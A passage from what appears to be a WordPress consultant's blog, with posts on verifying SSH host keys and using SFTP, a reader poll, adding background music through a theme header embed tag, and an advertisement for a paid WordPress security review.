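    print(published, host_key_matches(line, published))
    print(host_key_matches(tampered_copy(line), published))
```

    Once accepted, the key is stored (OpenSSH keeps it in ~/.ssh/known_hosts) and the client will warn loudly if the server ever presents a different one; a surprise "host key changed" warning deserves a phone call to the provider, not another click on accept.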

    You may find your file uploads and downloads are a little slower; this is caused by the overhead of encrypting the traffic, but it is a small price to pay for security.

    VIDEO: See how easy it is to capture a password

    A while back I created a screencast video of me capturing login details from an FTP session, to show you how easy it is to capture this data.

    [youtube=http://www.youtube.com/watch?v=DjqMCneUR10]

  • Poll: What Is Your WordPress Problem?

    I run irregular surveys on my site, and I use the results to develop content and services.  Please take a moment to click on the answer to my survey: what is currently your most pressing WordPress problem?  If you answer "other", please take the time to leave a comment telling me what your issue is.

    [poll id=”4″]

  • Adding Music To Your Blog

    I was asked by a client to add some background music to a WordPress site; this is my quick how-to.

    That Mall Shopping Experience

    The site in question was using WordPress as a CMS rather than a blog.  It is an e-commerce site selling designer jewellery, so I guess the browsing and shopping experience can be improved by adding music.

    Real Music, Not Muzak

    It also helps that the site owner is also a musician and has their own stash of quality and unique tracks to play over the top of the site.

    Adding A Command To The Header

    Here’s the nitty-gritty on how I plan to add the music file and have it play when the site is opened.  You need to add a tag to your theme’s header file.

    Depending upon your chosen theme you will have to either edit your theme’s header.php file or, if you have a funky new theme like Headway or Thesis, add this to the header script section.

    I recommend you add it just before the </head> tag.

    The code you need to add is:

    <embed src="YOURMUSICFILE" autostart="true" loop="true" hidden="true"></embed>

    I used this method instead of one of the many available media players because the site owner did not request a player control to be visible.

    A Word Of Warning

    Music is a very subjective thing, adding your latest death metal recording to a personal development blog may not be the best thing.

    Give people an option to stop what they may see as a cacophony; the tag above does not supply that, and modern browsers refuse to autoplay sound at all until the visitor has interacted with the page, so a visible player with a stop button serves you better in the long run.

    Music files will consume bandwidth like a group of sturdy Americans at an all-you-can-eat Las Vegas buffet; be wary of this and check with your hosting provider before adding music.

    Wrap Up

    Adding music to a WordPress site may be great for your blog if it matches your audience, so why not give it a try?  Now, where is my MP3 of Billy Ray Cyrus’s Achy Breaky Heart?

  • Another Hacked WordPress Site!

    Whilst working on a client site recently, fixing some theme issues, I stumbled upon some dubious code: the site had been hacked.

    This is not a one-off occurrence; I see sites that have been hacked on an all too regular basis.

    I have had site owners coming to me worried or embarrassed by the hack attack.

    I have found sites that are hacked where the owner has no idea there is a problem.

    I have had enough of this.

    Enough is Enough, It’s Time To Secure Your Sites

    I have created a new service to ensure that your site is not another victim of the hackers out there.

    I will review your current installation and prepare a detailed report showing where the security flaws are, and how to fix them.

    Why Target WordPress

    WordPress is not inherently insecure; rather, it is a victim of its own success.

    There are millions of WordPress sites out there, and many are run by people with little or no IT security training.

    This combination means hackers put a lot of effort into finding vulnerabilities in WordPress and targeting these sites for their attacks.

    Whats In The Report

    Upon completion of the review, I will pass you a PDF report of my findings.  It will include:

    • Areas where your security needs to be tightened
    • The reason why this is an issue
    • A detailed description on how to fix this issue and remove the security loophole

    Making The Technical Changes

    I will also include a quote for WordPress services to fix all of the issues I find, just in case you are not interested in doing the technical work yourself.

    How Much Is The Review?

    The review comes at a fixed fee of $197.

    Get On The Waiting List

    I am pretty sure this is going to be a very popular service, so book now using the form below to get your review.

    I will be offering this service on a first come, first served basis.

    UPDATE This has been moved to my consulting pages https://dev.neilmatthews.com/wordpress-consulting-services/wordpress-security-audit